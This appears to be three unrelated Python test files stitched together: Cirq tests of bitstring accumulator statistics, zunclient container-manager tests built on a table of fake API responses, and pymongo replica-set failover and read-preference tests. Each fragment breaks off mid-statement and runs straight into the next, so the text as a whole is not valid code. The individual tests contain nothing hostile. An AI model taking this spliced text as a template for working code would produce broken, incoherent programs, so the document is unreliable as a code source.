+Z(q(0)) * +Z(q(1)) → Y(q(1)): 0.000 +- 0.577"""
)
def test_bitstring_accumulator_equality():
et = cirq.testing.EqualsTester()
bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=np.uint8)
chunksizes = np.asarray([4])
timestamps = np.asarray([datetime.datetime.now()])
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
qubit_to_index = {a: 0, b: 1}
obs = cirq.Z(a) * cirq.Z(b) * 10
setting = cw.InitObsSetting(init_state=cirq.Z(a) * cirq.Z(b), observable=obs)
meas_spec = _MeasurementSpec(setting, {})
cirq.testing.assert_equivalent_repr(
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings.copy(),
chunksizes=chunksizes.copy(),
timestamps=timestamps.copy(),
)
)
et.add_equality_group(
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings.copy(),
chunksizes=chunksizes.copy(),
timestamps=timestamps.copy(),
),
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings.copy(),
chunksizes=chunksizes.copy(),
timestamps=timestamps.copy(),
),
)
time.sleep(1)
timestamps = np.asarray([datetime.datetime.now()])
et.add_equality_group(
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
)
et.add_equality_group(
cw.BitstringAccumulator(
meas_spec=_MeasurementSpec(setting, {'a': 2}),
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
)
bitstrings = bitstrings.copy()
bitstrings[0] = [1, 1]
et.add_equality_group(
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
)
chunksizes = np.asarray([2, 2])
timestamps = np.asarray(list(timestamps) * 2)
et.add_equality_group(
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
)
def _get_ZZ_Z_Z_bsa_constructor_args():
bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=np.uint8)
chunksizes = np.asarray([4])
timestamps = np.asarray([datetime.datetime.now()])
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
qubit_to_index = {a: 0, b: 1}
settings = list(
cw.observables_to_settings(
[cirq.Z(a) * cirq.Z(b) * 7, cirq.Z(a) * 5, cirq.Z(b) * 3], qubits=[a, b]
)
)
meas_spec = _MeasurementSpec(settings[0], {})
return {
'meas_spec': meas_spec,
'simul_settings': settings,
'qubit_to_index': qubit_to_index,
'bitstrings': bitstrings,
'chunksizes': chunksizes,
'timestamps': timestamps,
}
def test_bitstring_accumulator_stats():
kwargs = _get_ZZ_Z_Z_bsa_constructor_args()
settings = kwargs['simul_settings']
a, b = kwargs['qubit_to_index']
bsa = cw.BitstringAccumulator(**kwargs)
# There are three observables, each with mean 0 because
# the four 2-bit strings have even numbers of a) ones in the
# first position b) ones in the second position c) even parity
# pairs.
np.testing.assert_allclose([0, 0, 0], bsa.means())
# Covariance: Sum[(x - xbar)(y - ybar)] / (N-1)
# where xbar and ybar are 0, per above. Each individual observed
# value is +-1, so (x-xbar)(y-bar) is +-1 (neglecting observable coefficients)
# For off-diagonal elements, there are two +1 and two -1 terms for each entry
# so the total contribution is zero, and the matrix is diagonal
should_be = np.array([[4 * 7**2, 0, 0], [0, 4 * 5**2, 0], [0, 0, 4 * 3**2]])
should_be = should_be / (4 - 1) # covariance formula
should_be = should_be / 4 # cov of the distribution of sample mean
np.testing.assert_allclose(should_be, bsa.covariance())
for setting, var in zip(settings, [4 * 7**2, 4 * 5**2, 4 * 3**2]):
np.testing.assert_allclose(0, bsa.mean(setting))
np.testing.assert_allclose(var / 4 / (4 - 1), bsa.variance(setting))
np.testing.assert_allclose(np.sqrt(var / 4 / (4 - 1)), bsa.stderr(setting))
bad_obs = [cirq.X(a) * cirq.X(b)]
bad_setting = list(cw.observables_to_settings(bad_obs, qubits=[a, b]))[0]
with pytest.raises(ValueError):
bsa.mean(bad_setting)
def test_bitstring_accumulator_stats_2():
bitstrings = np.array([[0, 0], [0, 0], [1, 1], [1, 1]], np.uint8)
chunksizes = np.asarray([4])
timestamps = np.asarray([datetime.datetime.now()])
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
qubit_to_index = {a: 0, b: 1}
settings = list(cw.observables_to_settings([cirq.Z(a) * 5, cirq.Z(b) * 3], qubits=[a, b]))
meas_spec = _MeasurementSpec(settings[0], {})
bsa = cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=settings,
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
# There are three observables, each with mean 0 because
# the four 2-bit strings have even numbers of a) ones in the
# first position b) ones in the second position.
np.testing.assert_allclose([0, 0], bsa.means())
# Covariance: Sum[(x - xbar)(y - ybar)] / (N-1)
# where xbar and ybar are 0, per above. Each individual observed
# value is +-1, so (x-xbar)(y-bar) is +-1 (neglecting observable coefficients)
# In this case, the measurements are perfectly correlated.
should_be = 4 * np.array([[5 * 5, 5 * 3], [3 * 5, 3 * 3]])
should_be = should_be / (4 - 1) # covariance formula
should_be = should_be / 4 # cov of the distribution of sample mean
np.testing.assert_allclose(should_be, bsa.covariance())
for setting, var in zip(settings, [4 * 5**2, 4 * 3**2]):
np.testing.assert_allclose(0, bsa.mean(setting))
np.testing.assert_allclose(var / 4 / (4 - 1), bsa.variance(setting))
np.testing.assert_allclose(np.sqrt(var / 4 / (4 - 1)), bsa.stderr(setting))
def test_bitstring_accumulator_errors():
q0, q1 = cirq.LineQubit.range(2)
settings = cw.observables_to_settings(
[cirq.X(q0), cirq.Y(q0), cirq.Z(q0), cirq.Z(q0) * cirq.Z(q1)], qubits=[q0, q1]
)
grouped_settings = cw.group_settings_greedy(settings)
max_setting = list(grouped_settings.keys())[0]
simul_settings = grouped_settings[max_setting]
with pytest.raises(ValueError):
bsa = cw.BitstringAccumulator(
meas_spec=_MeasurementSpec(max_setting, {}),
simul_settings=simul_settings,
qubit_to_index={q0: 0, q1: 1},
bitstrings=np.array([[0, | |
<filename>zunclient/tests/unit/v1/test_containers.py<gh_stars>0
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from six.moves.urllib import parse
import testtools
from testtools import matchers
from zunclient.common import utils as zun_utils
from zunclient import exceptions
from zunclient.tests.unit import utils
from zunclient.v1 import containers
CONTAINER1 = {'id': '1234',
'uuid': '36e527e4-6d03-4eda-9443-904424043741',
'name': 'test1',
'image_pull_policy': 'never',
'image': 'cirros',
'command': 'sh -c "echo hello"',
'cpu': '1',
'memory': '256',
'environment': {'hostname': 'zunsystem'},
'workdir': '/',
'labels': {'label1': 'foo'},
'hints': {'hint1': 'bar'},
'restart_policy': 'no',
'security_groups': ['test'],
'auto_remove': True,
'runtime': 'runc',
'hostname': 'testhost',
'disk': '20',
'auto_heal': False,
'privileged': False,
'healthcheck': {}
}
CONTAINER2 = {'id': '1235',
'uuid': 'c7f9da0f-581b-4586-8d0d-a6c894822165',
'name': 'test2',
'image_pull_policy': 'ifnotpresent',
'image': 'cirros',
'command': 'sleep 100000000',
'cpu': '1',
'memory': '256',
'environment': {'hostname': 'zunsystem'},
'workdir': '/',
'labels': {'label2': 'foo'},
'hints': {'hint2': 'bar'},
'restart_policy': 'on-failure:5',
'security_groups': ['test'],
'auto_remove': False,
'runtime': 'runc',
'hostname': 'testhost',
'auto_heal': False,
'privileged': True,
'healthcheck': {}
}
NETWORK1 = {'net_id': '99e90853-e1fd-4c57-a116-9e335deaa592',
'port_id': '83f39a10-45c8-4463-a274-5a7cda3e6c97',
'fixed_ips': [{
'ip_address': '10.0.0.7', 'version': 4,
'subnet_id': '5899aa85-c98f-4d1d-bc8f-99fed7bde5b9'}]
}
CREATE_CONTAINER1 = copy.deepcopy(CONTAINER1)
del CREATE_CONTAINER1['id']
del CREATE_CONTAINER1['uuid']
force_delete1 = False
force_delete2 = True
all_projects = True
signal = "SIGTERM"
name = "new-name"
timeout = 10
tty_height = "56"
tty_width = "121"
path = "/tmp/test.txt"
data = "/tmp/test.tar"
repo = "repo-test"
tag = "tag-test"
security_group = "testsg"
fake_responses = {
'/v1/containers':
{
'GET': (
{},
{'containers': [CONTAINER1, CONTAINER2]},
),
'POST': (
{},
CREATE_CONTAINER1,
),
},
'/v1/containers/?limit=2':
{
'GET': (
{},
{'containers': [CONTAINER1, CONTAINER2]},
),
},
'/v1/containers/?marker=%s' % CONTAINER2['uuid']:
{
'GET': (
{},
{'containers': [CONTAINER1, CONTAINER2]},
),
},
'/v1/containers/?limit=2&marker=%s' % CONTAINER2['uuid']:
{
'GET': (
{},
{'containers': [CONTAINER1, CONTAINER2]},
),
},
'/v1/containers/?sort_dir=asc':
{
'GET': (
{},
{'containers': [CONTAINER1, CONTAINER2]},
),
},
'/v1/containers/?sort_key=uuid':
{
'GET': (
{},
{'containers': [CONTAINER1, CONTAINER2]},
),
},
'/v1/containers/?sort_key=uuid&sort_dir=desc':
{
'GET': (
{},
{'containers': [CONTAINER1, CONTAINER2]},
),
},
'/v1/containers/%s' % CONTAINER1['id']:
{
'GET': (
{},
CONTAINER1
),
},
'/v1/containers/%s' % CONTAINER1['name']:
{
'GET': (
{},
CONTAINER1
),
},
'/v1/containers/%s/start' % CONTAINER1['id']:
{
'POST': (
{},
None,
),
},
'/v1/containers/%s?force=%s' % (CONTAINER1['id'], force_delete1):
{
'DELETE': (
{},
None,
),
},
'/v1/containers/%s?force=%s' % (CONTAINER1['id'], force_delete2):
{
'DELETE': (
{},
None,
),
},
'/v1/containers/%s?all_projects=%s' % (CONTAINER1['id'], all_projects):
{
'DELETE': (
{},
None,
),
},
'/v1/containers/%s/stop?timeout=10' % CONTAINER1['id']:
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/reboot?timeout=10' % CONTAINER1['id']:
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/pause' % CONTAINER1['id']:
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/unpause' % CONTAINER1['id']:
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/logs?%s'
% (CONTAINER1['id'], parse.urlencode({'stdout': True, 'stderr': True,
'timestamps': False, 'tail': 'all',
'since': None})):
{
'GET': (
{},
None,
),
},
'/v1/containers/%s/execute?%s'
% (CONTAINER1['id'], parse.urlencode({'command': CONTAINER1['command']})):
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/kill?%s' % (CONTAINER1['id'],
parse.urlencode({'signal': signal})):
{
'POST': (
{},
None,
),
},
'/v1/containers?run=true':
{
'POST': (
{},
CREATE_CONTAINER1,
),
},
'/v1/containers/%s/rename?%s' % (CONTAINER1['id'],
parse.urlencode({'name': name})):
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/attach' % CONTAINER1['id']:
{
'GET': (
{},
None,
),
},
'/v1/containers/%s/resize?w=%s&h=%s'
% (CONTAINER1['id'], tty_width, tty_height):
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/resize?h=%s&w=%s'
% (CONTAINER1['id'], tty_height, tty_width):
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/top?ps_args=None' % (CONTAINER1['id']):
{
'GET': (
{},
None,
),
},
'/v1/containers/%s/get_archive?%s'
% (CONTAINER1['id'], parse.urlencode({'path': path})):
{
'GET': (
{},
{'data': data},
),
},
'/v1/containers/%s/put_archive?%s'
% (CONTAINER1['id'], parse.urlencode({'path': path})):
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/stats?%s'
% (CONTAINER1['id'], parse.urlencode({'decode': False,
'stream': False})):
{
'GET': (
{},
None,
),
},
'/v1/containers/%s/commit?%s'
% (CONTAINER1['id'], parse.urlencode({'repository': repo,
'tag': tag})):
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/add_security_group?%s'
% (CONTAINER1['id'], parse.urlencode({'name': security_group})):
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/network_detach?%s'
% (CONTAINER1['id'], parse.urlencode({'network': 'neutron_network'})):
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/network_attach?%s'
% (CONTAINER1['id'], parse.urlencode({'network': 'neutron_network'})):
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/network_list'
% (CONTAINER1['id']):
{
'GET': (
{},
{'networks': NETWORK1},
),
},
'/v1/containers/%s/remove_security_group?%s'
% (CONTAINER1['id'], parse.urlencode({'name': security_group})):
{
'POST': (
{},
None,
),
},
'/v1/containers/%s/rebuild?image=cirros'
% (CONTAINER1['id']):
{
'POST': (
{},
None,
),
},
}
class ContainerManagerTest(testtools.TestCase):
def setUp(self):
super(ContainerManagerTest, self).setUp()
self.api = utils.FakeAPI(fake_responses)
self.mgr = containers.ContainerManager(self.api)
def test_container_create(self):
containers = self.mgr.create(**CREATE_CONTAINER1)
expect = [
('POST', '/v1/containers', {}, CREATE_CONTAINER1)
]
self.assertEqual(expect, self.api.calls)
self.assertTrue(containers)
def test_container_create_fail(self):
create_container_fail = copy.deepcopy(CREATE_CONTAINER1)
create_container_fail["wrong_key"] = "wrong"
self.assertRaisesRegex(exceptions.InvalidAttribute,
("Key must be in %s" %
','.join(containers.CREATION_ATTRIBUTES)),
self.mgr.create, **create_container_fail)
self.assertEqual([], self.api.calls)
def test_containers_list(self):
containers = self.mgr.list()
expect = [
('GET', '/v1/containers', {}, None),
]
self.assertEqual(expect, self.api.calls)
self.assertThat(containers, matchers.HasLength(2))
def _test_containers_list_with_filters(self, limit=None, marker=None,
sort_key=None, sort_dir=None,
expect=[]):
containers_filter = self.mgr.list(limit=limit, marker=marker,
sort_key=sort_key,
sort_dir=sort_dir)
self.assertEqual(expect, self.api.calls)
self.assertThat(containers_filter, matchers.HasLength(2))
def test_containers_list_with_limit(self):
expect = [
('GET', '/v1/containers/?limit=2', {}, None),
]
self._test_containers_list_with_filters(
limit=2,
expect=expect)
def test_containers_list_with_marker(self):
expect = [
('GET', '/v1/containers/?marker=%s' % CONTAINER2['uuid'],
{}, None),
]
self._test_containers_list_with_filters(
marker=CONTAINER2['uuid'],
expect=expect)
def test_containers_list_with_marker_limit(self):
expect = [
('GET', '/v1/containers/?limit=2&marker=%s' % CONTAINER2['uuid'],
{}, None),
]
self._test_containers_list_with_filters(
limit=2, marker=CONTAINER2['uuid'],
expect=expect)
def test_coontainer_list_with_sort_dir(self):
expect = [
('GET', '/v1/containers/?sort_dir=asc', {}, None),
]
self._test_containers_list_with_filters(
sort_dir='asc',
expect=expect)
def test_container_list_with_sort_key(self):
expect = [
('GET', '/v1/containers/?sort_key=uuid', {}, None),
]
self._test_containers_list_with_filters(
sort_key='uuid',
expect=expect)
def test_container_list_with_sort_key_dir(self):
expect = [
('GET', '/v1/containers/?sort_key=uuid&sort_dir=desc', {}, None),
]
self._test_containers_list_with_filters(
sort_key='uuid', sort_dir='desc',
expect=expect)
def test_container_show_by_id(self):
container = self.mgr.get(CONTAINER1['id'])
expect = [
('GET', '/v1/containers/%s' % CONTAINER1['id'], {}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertEqual(CONTAINER1['name'], container.name)
self.assertEqual(CONTAINER1['uuid'], container.uuid)
def test_container_show_by_name(self):
container = self.mgr.get(CONTAINER1['name'])
expect = [
('GET', '/v1/containers/%s' % CONTAINER1['name'], {}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertEqual(CONTAINER1['name'], container.name)
self.assertEqual(CONTAINER1['uuid'], container.uuid)
def test_containers_start(self):
containers = self.mgr.start(CONTAINER1['id'])
expect = [
('POST', '/v1/containers/%s/start' % CONTAINER1['id'],
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertTrue(containers)
def test_containers_delete(self):
containers = self.mgr.delete(CONTAINER1['id'], force=force_delete1)
expect = [
('DELETE', '/v1/containers/%s?force=%s' % (CONTAINER1['id'],
force_delete1),
{}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertIsNone(containers)
def test_containers_delete_with_force(self):
containers = self.mgr.delete(CONTAINER1['id'], force=force_delete2)
expect = [
('DELETE', '/v1/containers/%s?force=%s' % (CONTAINER1['id'],
force_delete2),
{}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertIsNone(containers)
def test_containers_delete_with_all_projects(self):
containers = self.mgr.delete(CONTAINER1['id'],
all_projects=all_projects)
expect = [
('DELETE', '/v1/containers/%s?all_projects=%s' % (CONTAINER1['id'],
all_projects),
{}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertIsNone(containers)
def test_containers_stop(self):
containers = self.mgr.stop(CONTAINER1['id'], timeout)
expect = [
('POST', '/v1/containers/%s/stop?timeout=10' % CONTAINER1['id'],
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertTrue(containers)
def test_containers_restart(self):
containers = self.mgr.restart(CONTAINER1['id'], timeout)
expect = [
('POST', '/v1/containers/%s/reboot?timeout=10' % CONTAINER1['id'],
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertTrue(containers)
def test_containers_pause(self):
containers = self.mgr.pause(CONTAINER1['id'])
expect = [
('POST', '/v1/containers/%s/pause' % CONTAINER1['id'],
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertTrue(containers)
def test_containers_unpause(self):
containers = self.mgr.unpause(CONTAINER1['id'])
expect = [
('POST', '/v1/containers/%s/unpause' % CONTAINER1['id'],
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertTrue(containers)
def test_containers_logs(self):
containers = self.mgr.logs(CONTAINER1['id'], stdout=True, stderr=True,
timestamps=False, tail='all', since=None)
expect = [
('GET', '/v1/containers/%s/logs?%s'
% (CONTAINER1['id'], parse.urlencode({'stdout': True,
'stderr': True,
'timestamps': False,
'tail': 'all',
'since': None})),
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertIsNone(containers)
def test_containers_execute(self):
containers = self.mgr.execute(CONTAINER1['id'],
command=CONTAINER1['command'])
expect = [
('POST', '/v1/containers/%s/execute?%s'
% (CONTAINER1['id'], parse.urlencode({'command':
CONTAINER1['command']})),
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertIsNone(containers)
def test_containers_kill(self):
containers = self.mgr.kill(CONTAINER1['id'], signal)
expect = [
('POST', '/v1/containers/%s/kill?%s'
% (CONTAINER1['id'], parse.urlencode({'signal': signal})),
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertIsNone(containers)
def test_container_run(self):
containers = self.mgr.run(**CREATE_CONTAINER1)
expect = [
('POST', '/v1/containers?run=true', {}, CREATE_CONTAINER1)
]
self.assertEqual(expect, self.api.calls)
self.assertTrue(containers)
def test_container_run_fail(self):
run_container_fail = copy.deepcopy(CREATE_CONTAINER1)
run_container_fail["wrong_key"] = "wrong"
self.assertRaisesRegex(exceptions.InvalidAttribute,
("Key must be in %s" %
','.join(containers.CREATION_ATTRIBUTES)),
self.mgr.run, **run_container_fail)
self.assertEqual([], self.api.calls)
def test_containers_rename(self):
containers = self.mgr.rename(CONTAINER1['id'], name)
expect = [
('POST', '/v1/containers/%s/rename?%s'
% (CONTAINER1['id'], parse.urlencode({'name': name})),
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertTrue(containers)
def test_containers_attach(self):
containers = self.mgr.attach(CONTAINER1['id'])
expect = [
('GET', '/v1/containers/%s/attach' % CONTAINER1['id'],
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertIsNone(containers)
def test_containers_resize(self):
containers = self.mgr.resize(CONTAINER1['id'], tty_width, tty_height)
expects = []
expects.append([
('POST', '/v1/containers/%s/resize?w=%s&h=%s'
% (CONTAINER1['id'], tty_width, tty_height),
{'Content-Length': '0'}, None)
])
expects.append([
('POST', '/v1/containers/%s/resize?h=%s&w=%s'
% (CONTAINER1['id'], tty_height, tty_width),
{'Content-Length': '0'}, None)
])
self.assertTrue(self.api.calls in expects)
self.assertIsNone(containers)
def test_containers_top(self):
containers = self.mgr.top(CONTAINER1['id'])
expect = [
('GET', '/v1/containers/%s/top?ps_args=None' % CONTAINER1['id'],
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertIsNone(containers)
def test_containers_get_archive(self):
response = self.mgr.get_archive(CONTAINER1['id'], path)
expect = [
('GET', '/v1/containers/%s/get_archive?%s'
% (CONTAINER1['id'], parse.urlencode({'path': path})),
{'Content-Length': '0'}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertEqual(zun_utils.decode_file_data(data), response['data'])
def test_containers_put_archive(self):
response = self.mgr.put_archive(CONTAINER1['id'], path, data)
expect = [
('POST', '/v1/containers/%s/put_archive?%s'
% (CONTAINER1['id'], parse.urlencode({'path': path})),
{'Content-Length': '0'},
{'data': zun_utils.encode_file_data(data)})
]
self.assertEqual(expect, self.api.calls)
self.assertTrue(response)
def test_containers_commit(self):
containers = | |
!= c.primary)
self.assertEqual('baz', db.test.find_one({'bar': 'baz'})['bar'])
def tearDown(self):
Monitor._refresh_interval = MONITOR_INTERVAL
super(TestWritesWithFailover, self).tearDown()
class TestReadWithFailover(HATestCase):
def setUp(self):
res = ha_tools.start_replica_set([{}, {}, {}])
self.seed, self.name = res
def test_read_with_failover(self):
c = MongoReplicaSetClient(
self.seed, replicaSet=self.name, use_greenlets=use_greenlets)
self.assertTrue(bool(len(c.secondaries)))
def iter_cursor(cursor):
for _ in cursor:
pass
return True
db = c.pymongo_test
w = len(c.secondaries) + 1
db.test.remove({}, w=w)
# Force replication
db.test.insert([{'foo': i} for i in xrange(10)], w=w)
self.assertEqual(10, db.test.count())
db.read_preference = SECONDARY_PREFERRED
cursor = db.test.find().batch_size(5)
cursor.next()
self.assertEqual(5, cursor._Cursor__retrieved)
self.assertTrue(cursor._Cursor__connection_id in c.secondaries)
ha_tools.kill_primary()
# Primary failure shouldn't interrupt the cursor
self.assertTrue(iter_cursor(cursor))
self.assertEqual(10, cursor._Cursor__retrieved)
class TestReadPreference(HATestCase):
def setUp(self):
members = [
# primary
{'tags': {'dc': 'ny', 'name': 'primary'}},
# secondary
{'tags': {'dc': 'la', 'name': 'secondary'}, 'priority': 0},
# other_secondary
{'tags': {'dc': 'ny', 'name': 'other_secondary'}, 'priority': 0},
]
res = ha_tools.start_replica_set(members)
self.seed, self.name = res
primary = ha_tools.get_primary()
self.primary = _partition_node(primary)
self.primary_tags = ha_tools.get_tags(primary)
# Make sure priority worked
self.assertEqual('primary', self.primary_tags['name'])
self.primary_dc = {'dc': self.primary_tags['dc']}
secondaries = ha_tools.get_secondaries()
(secondary, ) = [
s for s in secondaries
if ha_tools.get_tags(s)['name'] == 'secondary']
self.secondary = _partition_node(secondary)
self.secondary_tags = ha_tools.get_tags(secondary)
self.secondary_dc = {'dc': self.secondary_tags['dc']}
(other_secondary, ) = [
s for s in secondaries
if ha_tools.get_tags(s)['name'] == 'other_secondary']
self.other_secondary = _partition_node(other_secondary)
self.other_secondary_tags = ha_tools.get_tags(other_secondary)
self.other_secondary_dc = {'dc': self.other_secondary_tags['dc']}
self.c = MongoReplicaSetClient(
self.seed, replicaSet=self.name, use_greenlets=use_greenlets)
self.db = self.c.pymongo_test
self.w = len(self.c.secondaries) + 1
self.db.test.remove({}, w=self.w)
self.db.test.insert(
[{'foo': i} for i in xrange(10)], w=self.w)
self.clear_ping_times()
def set_ping_time(self, host, ping_time_seconds):
Member._host_to_ping_time[host] = ping_time_seconds
def clear_ping_times(self):
Member._host_to_ping_time.clear()
def test_read_preference(self):
# We pass through four states:
#
# 1. A primary and two secondaries
# 2. Primary down
# 3. Primary up, one secondary down
# 4. Primary up, all secondaries down
#
# For each state, we verify the behavior of PRIMARY,
# PRIMARY_PREFERRED, SECONDARY, SECONDARY_PREFERRED, and NEAREST
c = MongoReplicaSetClient(
self.seed, replicaSet=self.name, use_greenlets=use_greenlets)
def assertReadFrom(member, *args, **kwargs):
utils.assertReadFrom(self, c, member, *args, **kwargs)
def assertReadFromAll(members, *args, **kwargs):
utils.assertReadFromAll(self, c, members, *args, **kwargs)
def unpartition_node(node):
host, port = node
return '%s:%s' % (host, port)
# To make the code terser, copy hosts into local scope
primary = self.primary
secondary = self.secondary
other_secondary = self.other_secondary
bad_tag = {'bad': 'tag'}
# 1. THREE MEMBERS UP -------------------------------------------------
# PRIMARY
assertReadFrom(primary, PRIMARY)
# PRIMARY_PREFERRED
# Trivial: mode and tags both match
assertReadFrom(primary, PRIMARY_PREFERRED, self.primary_dc)
# Secondary matches but not primary, choose primary
assertReadFrom(primary, PRIMARY_PREFERRED, self.secondary_dc)
# Chooses primary, ignoring tag sets
assertReadFrom(primary, PRIMARY_PREFERRED, self.primary_dc)
# Chooses primary, ignoring tag sets
assertReadFrom(primary, PRIMARY_PREFERRED, bad_tag)
assertReadFrom(primary, PRIMARY_PREFERRED, [bad_tag, {}])
# SECONDARY
assertReadFromAll([secondary, other_secondary], SECONDARY)
# SECONDARY_PREFERRED
assertReadFromAll([secondary, other_secondary], SECONDARY_PREFERRED)
# Multiple tags
assertReadFrom(secondary, SECONDARY_PREFERRED, self.secondary_tags)
# Fall back to primary if it's the only one matching the tags
assertReadFrom(primary, SECONDARY_PREFERRED, {'name': 'primary'})
# No matching secondaries
assertReadFrom(primary, SECONDARY_PREFERRED, bad_tag)
# Fall back from non-matching tag set to matching set
assertReadFromAll([secondary, other_secondary],
SECONDARY_PREFERRED, [bad_tag, {}])
assertReadFrom(other_secondary,
SECONDARY_PREFERRED, [bad_tag, {'dc': 'ny'}])
# NEAREST
self.clear_ping_times()
assertReadFromAll([primary, secondary, other_secondary], NEAREST)
assertReadFromAll([primary, other_secondary],
NEAREST, [bad_tag, {'dc': 'ny'}])
self.set_ping_time(primary, 0)
self.set_ping_time(secondary, .03) # 30 ms
self.set_ping_time(other_secondary, 10)
# Nearest member, no tags
assertReadFrom(primary, NEAREST)
# Tags override nearness
assertReadFrom(primary, NEAREST, {'name': 'primary'})
assertReadFrom(secondary, NEAREST, self.secondary_dc)
# Make secondary fast
self.set_ping_time(primary, .03) # 30 ms
self.set_ping_time(secondary, 0)
assertReadFrom(secondary, NEAREST)
# Other secondary fast
self.set_ping_time(secondary, 10)
self.set_ping_time(other_secondary, 0)
assertReadFrom(other_secondary, NEAREST)
# High secondaryAcceptableLatencyMS, should read from all members
assertReadFromAll(
[primary, secondary, other_secondary],
NEAREST, secondary_acceptable_latency_ms=1000*1000)
self.clear_ping_times()
assertReadFromAll([primary, other_secondary], NEAREST, [{'dc': 'ny'}])
# 2. PRIMARY DOWN -----------------------------------------------------
killed = ha_tools.kill_primary()
# Let monitor notice primary's gone
sleep(2 * MONITOR_INTERVAL)
# PRIMARY
assertReadFrom(None, PRIMARY)
# PRIMARY_PREFERRED
# No primary, choose matching secondary
assertReadFromAll([secondary, other_secondary], PRIMARY_PREFERRED)
assertReadFrom(secondary, PRIMARY_PREFERRED, {'name': 'secondary'})
# No primary or matching secondary
assertReadFrom(None, PRIMARY_PREFERRED, bad_tag)
# SECONDARY
assertReadFromAll([secondary, other_secondary], SECONDARY)
# Only primary matches
assertReadFrom(None, SECONDARY, {'name': 'primary'})
# No matching secondaries
assertReadFrom(None, SECONDARY, bad_tag)
# SECONDARY_PREFERRED
assertReadFromAll([secondary, other_secondary], SECONDARY_PREFERRED)
# Mode and tags both match
assertReadFrom(secondary, SECONDARY_PREFERRED, {'name': 'secondary'})
# NEAREST
self.clear_ping_times()
assertReadFromAll([secondary, other_secondary], NEAREST)
# 3. PRIMARY UP, ONE SECONDARY DOWN -----------------------------------
ha_tools.restart_members([killed])
ha_tools.wait_for_primary()
ha_tools.kill_members([unpartition_node(secondary)], 2)
sleep(5)
ha_tools.wait_for_primary()
self.assertTrue(MongoClient(
unpartition_node(primary), use_greenlets=use_greenlets,
read_preference=PRIMARY_PREFERRED
).admin.command('ismaster')['ismaster'])
sleep(2 * MONITOR_INTERVAL)
# PRIMARY
assertReadFrom(primary, PRIMARY)
# PRIMARY_PREFERRED
assertReadFrom(primary, PRIMARY_PREFERRED)
# SECONDARY
assertReadFrom(other_secondary, SECONDARY)
assertReadFrom(other_secondary, SECONDARY, self.other_secondary_dc)
# Only the down secondary matches
assertReadFrom(None, SECONDARY, {'name': 'secondary'})
# SECONDARY_PREFERRED
assertReadFrom(other_secondary, SECONDARY_PREFERRED)
assertReadFrom(
other_secondary, SECONDARY_PREFERRED, self.other_secondary_dc)
# The secondary matching the tag is down, use primary
assertReadFrom(primary, SECONDARY_PREFERRED, {'name': 'secondary'})
# NEAREST
assertReadFromAll([primary, other_secondary], NEAREST)
assertReadFrom(other_secondary, NEAREST, {'name': 'other_secondary'})
assertReadFrom(primary, NEAREST, {'name': 'primary'})
# 4. PRIMARY UP, ALL SECONDARIES DOWN ---------------------------------
ha_tools.kill_members([unpartition_node(other_secondary)], 2)
